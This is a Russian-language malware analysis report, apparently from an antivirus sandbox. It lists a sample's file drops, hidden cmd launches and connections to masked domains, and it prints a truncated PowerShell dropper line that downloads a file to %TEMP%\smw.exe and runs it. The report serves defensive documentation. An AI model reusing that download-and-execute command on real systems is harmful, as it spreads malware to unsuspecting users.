Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $wkmaqxslj как %temp%\smw.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function icdoqpjvods([String] $wkmaqxslj){(New-Object System.Net.WebClient).DownloadFile($wkmaqxslj,''%TEMP%\smw.exe'');Start-Process ''%TEMP%\smw.exe'';}try{icdoqp...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\oyaqgehw8.bat
- %TEMP%\smw.exe
Сетевая активность
Подключается к
- 're###profi4u.de':80
- 're######ro-albatros.reise':443
- 'pi##a24.fr':80
TCP
Запросы HTTP GET
- http://re###profi4u.de/forsenror.png
- http://pi##a24.fr/forsenror.png
Другие
- 're######ro-albatros.reise':443
UDP
- DNS ASK re###profi4u.de
- DNS ASK re######ro-albatros.reise
- DNS ASK pi##a24.fr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function icdoqpjvods([String] $wkmaqxslj){(New-Object System.Net.WebClient).DownloadFile($wkmaqxslj,''%TEMP%\smw.exe'');Start-Process ''%TEMP%\smw.exe'';}try{icdoqp...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Oyaqgehw8.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Oyaqgehw8.bat" "
